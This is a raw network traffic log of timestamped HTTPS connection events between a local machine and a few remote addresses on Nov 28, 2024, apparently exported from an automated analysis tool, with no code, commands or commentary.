                                                                                                                                          Nov 28, 2024 11:32:56.092298985 CET443498025.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.092361927 CET49802443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.095587015 CET443498025.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.095648050 CET49802443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.134227037 CET443498035.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.134486914 CET49803443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.134516954 CET443498035.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.134903908 CET443498035.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.135211945 CET49803443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.135282993 CET443498035.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.135329008 CET49803443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.183147907 CET49803443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.183157921 CET443498035.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.193226099 CET443498025.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.193397045 CET49802443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.196413994 CET443498025.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.196496010 CET49802443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.199526072 CET443498025.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.199599981 CET49802443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.201414108 CET443498045.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.201644897 CET49804443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.201669931 CET443498045.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.202017069 CET443498045.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.202316046 CET49804443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.202375889 CET443498045.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.202445030 CET49804443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.202799082 CET443498025.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.202864885 CET49802443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.206499100 CET443498025.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.206573009 CET49802443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.209556103 CET443498025.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.209621906 CET49802443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.212965965 CET443498025.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.213023901 CET49802443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.216865063 CET443498025.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.216931105 CET49802443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.219904900 CET443498025.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.219975948 CET49802443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.223525047 CET443498025.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.223593950 CET49802443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.226752996 CET443498025.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.226819992 CET49802443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.247035027 CET443498055.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.247298956 CET49805443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.247329950 CET443498055.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.247328997 CET443498045.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.247710943 CET443498055.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.247767925 CET49805443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.248425007 CET443498055.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.248469114 CET49805443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.248617887 CET49805443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.248678923 CET443498055.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.248739004 CET49805443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.248754978 CET443498055.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.290771961 CET49805443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.291940928 CET443498025.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.292011976 CET49802443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.294766903 CET443498025.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.294837952 CET49802443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.297894001 CET443498025.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.297955990 CET49802443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.298397064 CET443498065.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.298563957 CET49806443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.298588991 CET443498065.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.298966885 CET443498065.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.299024105 CET49806443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.299674034 CET443498065.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.300153017 CET443498075.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.300209045 CET49806443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.300307035 CET49807443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.300323963 CET443498075.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.300416946 CET49806443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.300474882 CET443498065.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.300525904 CET49806443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.300544024 CET49806443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.300549030 CET443498065.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.300586939 CET49806443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.300698042 CET443498075.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.300760031 CET49807443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.301394939 CET443498075.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.301444054 CET49807443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.301534891 CET49807443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.301594973 CET443498075.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.301620007 CET49807443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.301642895 CET49807443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.301651955 CET443498075.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.301691055 CET49807443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.301842928 CET443498025.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.301904917 CET49802443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.304924965 CET443498025.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.304986954 CET443498025.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.304990053 CET49802443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.305027962 CET49802443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.305175066 CET49802443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.305196047 CET443498025.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.305206060 CET49802443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.305242062 CET49802443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.345825911 CET49809443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.345866919 CET443498095.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.345963001 CET49809443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.346363068 CET49809443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.346380949 CET443498095.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.347834110 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.347872019 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.348146915 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.348319054 CET49810443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.348331928 CET443498105.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.532818079 CET49811443192.168.2.420.109.210.53
                                                                                                                                          Nov 28, 2024 11:32:56.532860994 CET4434981120.109.210.53192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.536901951 CET49811443192.168.2.420.109.210.53
                                                                                                                                          Nov 28, 2024 11:32:56.537237883 CET49811443192.168.2.420.109.210.53
                                                                                                                                          Nov 28, 2024 11:32:56.537250996 CET4434981120.109.210.53192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.706264973 CET443498035.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.706300974 CET443498035.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.706310987 CET443498035.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.706362009 CET49803443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.706389904 CET443498035.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.706406116 CET49803443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.751960993 CET49803443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.775418997 CET443498045.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.775439024 CET443498045.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.775523901 CET49804443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.775549889 CET443498045.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.784837008 CET443498035.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.784852982 CET443498035.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.784921885 CET443498035.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:56.784929991 CET49803443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.784982920 CET49803443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:56.828313112 CET49804443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.047724962 CET443498055.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.047760963 CET443498055.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.047775030 CET443498055.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.047868967 CET49805443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.047890902 CET443498055.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.092422009 CET49805443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.173485041 CET443498045.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.173495054 CET443498045.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.173685074 CET49804443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.175450087 CET443498065.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.175478935 CET443498065.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.175545931 CET49806443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.175559044 CET443498065.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.176394939 CET443498075.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.176422119 CET443498075.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.176472902 CET49807443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.176486969 CET443498075.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.176498890 CET443498075.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.176527977 CET49807443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.176537037 CET443498075.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.176563978 CET443498075.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.176621914 CET49807443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.177247047 CET443498065.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.177305937 CET49806443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.177311897 CET443498065.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.177325010 CET49807443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.177344084 CET443498075.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.177347898 CET49806443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.177357912 CET49807443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.177383900 CET49807443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.178160906 CET443498035.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.178175926 CET443498035.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.178225994 CET49803443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.178229094 CET443498055.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.178240061 CET443498055.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.178255081 CET49803443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.178296089 CET49805443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.178826094 CET443498035.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.178845882 CET443498035.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.178878069 CET49803443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.178904057 CET49803443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.179122925 CET49806443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.179137945 CET443498065.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.179785967 CET443498035.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.179795980 CET443498035.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.179845095 CET49803443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.180676937 CET443498045.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.180682898 CET443498035.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.180686951 CET443498045.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.180747986 CET49803443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.180751085 CET49804443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.180793047 CET49804443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.182095051 CET443498045.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.182111025 CET443498035.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.182178020 CET49804443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.182868958 CET49803443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.183053017 CET443498055.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.183059931 CET443498055.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.183111906 CET49805443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.183927059 CET443498045.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.183993101 CET49804443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.187690020 CET443498055.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.187706947 CET443498055.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.187758923 CET49805443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.203651905 CET4434980813.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.203720093 CET49808443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:32:57.207427025 CET49808443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:32:57.207431078 CET4434980813.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.207707882 CET4434980813.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.215331078 CET49808443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:32:57.263328075 CET4434980813.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.294532061 CET443498055.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.294549942 CET443498055.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.294756889 CET49805443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.299585104 CET443498035.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.299678087 CET49803443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.299801111 CET443498045.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.299865007 CET49804443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.320375919 CET443498055.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.320385933 CET443498055.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.320547104 CET49805443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.320729971 CET443498035.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.320794106 CET49803443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.324981928 CET443498045.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.325056076 CET49804443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.344700098 CET443498035.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.344892979 CET49803443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.351695061 CET443498055.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.351775885 CET49805443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.359487057 CET443498045.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.359575033 CET49804443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.360604048 CET443498035.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.360683918 CET49803443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.374125004 CET443498055.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.374249935 CET49805443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.376749992 CET443498035.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.376851082 CET49803443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.383713007 CET443498045.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.383810997 CET49804443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.392944098 CET443498035.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.393040895 CET49803443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.396900892 CET443498055.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.396991968 CET49805443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.418858051 CET443498035.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.418931961 CET49803443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.421268940 CET443498045.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.421334982 CET49804443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.423377037 CET443498055.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.423446894 CET49805443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.432111025 CET443498035.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.432183027 CET49803443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.441957951 CET443498045.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.442023993 CET49804443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.445651054 CET443498055.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.445712090 CET49805443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.453568935 CET443498035.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.453635931 CET49803443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.467139006 CET443498045.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.467195988 CET49804443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.469552994 CET443498035.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.469610929 CET49803443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.475881100 CET443498055.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.475940943 CET49805443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.485605001 CET443498035.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.485657930 CET49803443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.494585991 CET443498055.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.494643927 CET49805443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.497678995 CET443498045.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.497735977 CET49804443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.504275084 CET443498035.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.504336119 CET49803443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.513426065 CET443498045.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.513498068 CET49804443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.520307064 CET443498035.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.520365000 CET49803443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.520657063 CET443498055.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.520699978 CET49805443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.520731926 CET49805443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.527920008 CET443498045.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.527990103 CET49804443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.538103104 CET443498055.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.538156986 CET49805443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.543426991 CET443498045.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.543430090 CET443498035.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.543500900 CET443498045.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.543503046 CET49804443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.543529034 CET49803443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.543549061 CET49804443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.544454098 CET49804443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.544477940 CET443498045.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.547926903 CET49812443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.547952890 CET443498125.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.548001051 CET49812443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.548444986 CET49812443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.548455954 CET443498125.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.551422119 CET443498055.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.551475048 CET49805443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.551841021 CET49813443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.551883936 CET443498135.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.551942110 CET49813443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.552284956 CET49813443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.552304983 CET443498135.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.555768013 CET443498035.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.556113005 CET49803443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.558954000 CET443498055.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.559011936 CET49805443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.561460972 CET443498035.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.561522961 CET49803443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.566817999 CET443498035.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.566881895 CET49803443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.568856001 CET443498055.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.568917990 CET49805443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.573865891 CET443498035.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.573916912 CET49803443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.576565981 CET443498055.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.576637983 CET49805443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.581897020 CET443498035.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.581955910 CET49803443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.582034111 CET443498035.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.582077980 CET49803443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:57.582087994 CET443498035.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.582113028 CET443498035.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.582150936 CET49803443192.168.2.45.57.41.119
